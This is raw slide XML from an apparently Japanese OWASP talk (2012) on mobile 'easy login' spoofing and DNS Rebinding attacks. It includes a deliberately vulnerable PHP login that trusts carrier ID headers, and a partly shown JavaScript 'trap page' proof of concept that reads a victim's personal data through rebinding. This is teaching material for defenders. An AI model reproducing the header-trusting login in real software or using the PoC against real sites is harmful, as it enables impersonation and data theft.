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65" r:id="rId3"/>
    <p:sldId id="304" r:id="rId4"/>
    <p:sldId id="306" r:id="rId5"/>
    <p:sldId id="342" r:id="rId6"/>
    <p:sldId id="343" r:id="rId7"/>
    <p:sldId id="344" r:id="rId8"/>
    <p:sldId id="346" r:id="rId9"/>
    <p:sldId id="347" r:id="rId10"/>
    <p:sldId id="349" r:id="rId11"/>
    <p:sldId id="307" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="310" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="313" r:id="rId18"/>
    <p:sldId id="315" r:id="rId19"/>
    <p:sldId id="317" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="316" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="320" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="323" r:id="rId27"/>
    <p:sldId id="321" r:id="rId28"/>
    <p:sldId id="324" r:id="rId29"/>
    <p:sldId id="328" r:id="rId30"/>
    <p:sldId id="329" r:id="rId31"/>
    <p:sldId id="330" r:id="rId32"/>
    <p:sldId id="331" r:id="rId33"/>
    <p:sldId id="333" r:id="rId34"/>
    <p:sldId id="334" r:id="rId35"/>
    <p:sldId id="332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259" r:id="rId44"/>
  </p:sldIdLst>
  <p:sldSz cx="10080625" cy="7559675"/>
  <p:notesSz cx="6883400" cy="100171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757"/>
    <a:srgbClr val="FF5B5B"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="0000DE"/>
    <a:srgbClr val="7D7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86455" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-408" y="-84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3186"/>
        <p:guide pos="5603"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="2446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-2538" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2698"/>
        <p:guide pos="19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3888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513888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9" tIns="46740" rIns="93479" bIns="4674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BA598620-932D-4522-ACCE-6B879159E136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1075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213" y="760413"/>
            <a:ext cx="5003800" cy="375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7388" y="4757738"/>
            <a:ext cx="5507037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6088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0332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78373" algn="l"/>
                <a:tab pos="1356745" algn="l"/>
                <a:tab pos="2033496" algn="l"/>
                <a:tab pos="2711868" algn="l"/>
              </a:tabLst>
              <a:defRPr kumimoji="0" sz="13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5725" y="0"/>
            <a:ext cx="2986088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0332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78373" algn="l"/>
                <a:tab pos="1356745" algn="l"/>
                <a:tab pos="2033496" algn="l"/>
                <a:tab pos="2711868" algn="l"/>
              </a:tabLst>
              <a:defRPr kumimoji="0" sz="13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15475"/>
            <a:ext cx="2986088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0332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78373" algn="l"/>
                <a:tab pos="1356745" algn="l"/>
                <a:tab pos="2033496" algn="l"/>
                <a:tab pos="2711868" algn="l"/>
              </a:tabLst>
              <a:defRPr kumimoji="0" sz="13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5725" y="9515475"/>
            <a:ext cx="2986088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0332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78373" algn="l"/>
                <a:tab pos="1356745" algn="l"/>
                <a:tab pos="2033496" algn="l"/>
                <a:tab pos="2711868" algn="l"/>
              </a:tabLst>
              <a:defRPr kumimoji="0" sz="13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fld id="{913F3C1E-57AC-45BC-88D8-C8594A6110D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116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19100">
              <a:tabLst>
                <a:tab pos="677863" algn="l"/>
                <a:tab pos="1355725" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2711450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{0B202DFD-357F-45C9-854D-EFB58FCAE666}" type="slidenum">
              <a:rPr lang="en-GB" altLang="ja-JP" smtClean="0">
                <a:ea typeface="ＭＳ Ｐ明朝" charset="-128"/>
              </a:rPr>
              <a:pPr defTabSz="419100">
                <a:tabLst>
                  <a:tab pos="677863" algn="l"/>
                  <a:tab pos="1355725" algn="l"/>
                  <a:tab pos="2032000" algn="l"/>
                  <a:tab pos="2711450" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="ja-JP" smtClean="0">
              <a:ea typeface="ＭＳ Ｐ明朝" charset="-128"/>
            </a:endParaRPr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2638" y="798513"/>
            <a:ext cx="5316537" cy="3987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7575" y="5053013"/>
            <a:ext cx="5045075" cy="4792662"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/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B40B-465D-48A8-AFC2-444FFB1F3061}" type="slidenum">
              <a:rPr lang="en-US" altLang="ja-JP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B40B-465D-48A8-AFC2-444FFB1F3061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B40B-465D-48A8-AFC2-444FFB1F3061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3F3C1E-57AC-45BC-88D8-C8594A6110D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B40B-465D-48A8-AFC2-444FFB1F3061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B40B-465D-48A8-AFC2-444FFB1F3061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B40B-465D-48A8-AFC2-444FFB1F3061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B40B-465D-48A8-AFC2-444FFB1F3061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8B40B-465D-48A8-AFC2-444FFB1F3061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BB2B-8D0B-4DA3-887B-CD78FE2255B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AA48-B0D2-49EE-AA9D-B8C19977ED9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80288" y="157163"/>
            <a:ext cx="2338387" cy="659923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60363" y="157163"/>
            <a:ext cx="6867525" cy="659923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14EE-12FD-4F65-A648-B288CA2BBA72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363" y="157163"/>
            <a:ext cx="9358312" cy="5969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60363" y="900113"/>
            <a:ext cx="9358312" cy="5856287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  <a:endParaRPr lang="ja-JP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7025-8E45-415C-AE53-43B6528493AC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007" y="41998"/>
            <a:ext cx="8213260" cy="39198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2DCA-F655-40B8-9FD8-0E5DDF3833C6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2516255"/>
            <a:ext cx="8567738" cy="1501775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="1" cap="none" baseline="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862080"/>
            <a:ext cx="8567738" cy="1654175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8865-BCE4-46F0-824B-3363C6694109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60363" y="900113"/>
            <a:ext cx="4602162" cy="585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4925" y="900113"/>
            <a:ext cx="4603750" cy="585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4D11-5694-44AC-A4A8-8B69E1DC59D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21F0-B392-4A8F-BFDF-2B590A4AD2CD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2879725" y="7240588"/>
            <a:ext cx="4105275" cy="2889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Copyright © 2008-2012 HASH Consulting Corp.</a:t>
            </a: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7227888" y="7240588"/>
            <a:ext cx="2611437" cy="2889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EACF-5DE6-44CD-A549-37560DB1CAA1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>&lt;#&gt;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7C40-2E7C-4EFD-B3A0-68EA3EDC62A3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4EA1C-FCE3-4E8F-9545-F7C37F67B0DB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C1BD4-EA9C-4277-AA7C-EB7767EBA5BE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157163"/>
            <a:ext cx="9358312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900113"/>
            <a:ext cx="9358312" cy="5856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5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6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7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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-GB" smtClean="0"/>
              <a:t>レベル目のアウトライン</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" smtClean="0"/>
              <a:t>9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164388"/>
            <a:ext cx="2346325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kumimoji="0" sz="14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79725" y="7164388"/>
            <a:ext cx="4105275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kumimoji="0" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ ゴシック" pitchFamily="49" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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164388"/>
            <a:ext cx="2346325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</a:tabLst>
              <a:defRPr kumimoji="0" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐ明朝" pitchFamily="18" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DFE37414-DB61-4942-AAF9-62AFEAB4D237}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6" descr="hash-logo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5427" y="6889742"/>
            <a:ext cx="1905000" cy="6191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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128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>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="50" charset="-128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3200">
          <a:solidFill>
            <a:srgbClr val="000000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kumimoji="1"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kumimoji="1"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kumimoji="1"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kumimoji="1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kumimoji="1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kumimoji="1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kumimoji="1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kumimoji="1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kumimoji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1.wmv"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media1.wm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2.wmv"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media2.wm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media" Target="../media/media3.wmv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3.wmv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4.wmv"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media4.wm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5.wmv"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media5.wmv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KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>GW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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「かんたんログイン」なりすまし問題を振り返る</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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22538" y="6115049"/>
            <a:ext cx="7056437" cy="938213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99207" tIns="51588" rIns="99207" bIns="51588"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="390525" lvl="1" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="83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90525" algn="l"/>
                <a:tab pos="1398588" algn="l"/>
                <a:tab pos="2406650" algn="l"/>
                <a:tab pos="3414713" algn="l"/>
                <a:tab pos="4422775" algn="l"/>
                <a:tab pos="5430838" algn="l"/>
                <a:tab pos="6438900" algn="l"/>
                <a:tab pos="7446963" algn="l"/>
                <a:tab pos="8455025" algn="l"/>
                <a:tab pos="9463088" algn="l"/>
                <a:tab pos="10471150" algn="l"/>
                <a:tab pos="11479213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>日</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="390525" lvl="1" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="83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90525" algn="l"/>
                <a:tab pos="1398588" algn="l"/>
                <a:tab pos="2406650" algn="l"/>
                <a:tab pos="3414713" algn="l"/>
                <a:tab pos="4422775" algn="l"/>
                <a:tab pos="5430838" algn="l"/>
                <a:tab pos="6438900" algn="l"/>
                <a:tab pos="7446963" algn="l"/>
                <a:tab pos="8455025" algn="l"/>
                <a:tab pos="9463088" algn="l"/>
                <a:tab pos="10471150" algn="l"/>
                <a:tab pos="11479213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>徳丸　浩</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="ＭＳ Ｐゴシック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50" y="28575"/>
            <a:ext cx="550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OWASP Japan 2nd Local Chapter Meeting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>
          <a:xfrm>
            <a:off x="2879725" y="7216343"/>
            <a:ext cx="4105275" cy="288925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キャリアゲートウェイからのリクエストであることを</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>アドレスで確認（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>を使うなど）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>UserAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>によるキャリア判定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>リクエストヘッダからケータイ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>取り出し</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ケータイ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>が改変されていないと信頼して認証に使う</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="20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かんたんログインの標準的な実装</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6522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9681" y="3264606"/>
            <a:ext cx="2866678" cy="36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22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6715" y="3264606"/>
            <a:ext cx="2856177" cy="36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フッター プレースホルダ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今日の攻撃目標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&lt;?php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require_once('Net/UserAgent/Mobile.php');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$agent = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Net_UserAgent_Mobile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>::singleton();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$id = '';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if ($agent-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>isDoCoMo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>()) {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  $id = $_SERVER['HTTP_X_DCMGUID'];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} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>elseif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t> ($agent-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>isEZweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>()) {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  $id = $_SERVER['HTTP_X_UP_SUBNO'];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} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>elseif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t> ($agent-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>isVodafone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>()) {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  $id = $_SERVER['HTTP_X_JPHONE_UID'];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}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// $id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>を固有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>として認証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if ($id) {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  echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>こんにちは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>” . htmlspecialchars($id) . "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>さん</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;br&gt;";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  echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>あなたの個人情報は下記の通りです</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;br&gt;";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  echo htmlspecialchars($a[$id]);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} else {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  echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>認証エラー</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:&lt;br&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>端末</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>を有効にしてご利用下さい</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>";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ja-JP" sz="1800" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1800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正常系</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo1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00015a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35313" y="1208088"/>
            <a:ext cx="3810000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright © 2008-2012 HASH Consulting Corp.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正常系</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo2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00020a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35313" y="1208088"/>
            <a:ext cx="3810000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright © 2008-2012 HASH Consulting Corp.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とくまるひろしの</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>DNS Rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻撃入門</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0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攻撃用スクリプト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ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>これは罠のページです</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;br&gt;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ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>今から、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DNS Rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>により、ターゲットサイトの個人情報を表示させます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;br&gt;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&lt;script&gt;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function trap(){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  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = new XMLHttpRequest();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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("GET", "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>login.php?guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=on", true);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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = function(){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    if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t> == 4) {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      var div = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("result");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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>div.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>エスケープしてないけど</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>なの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…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    }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  }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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xhr.send</a:t>
            </a:r>
            <a:r>
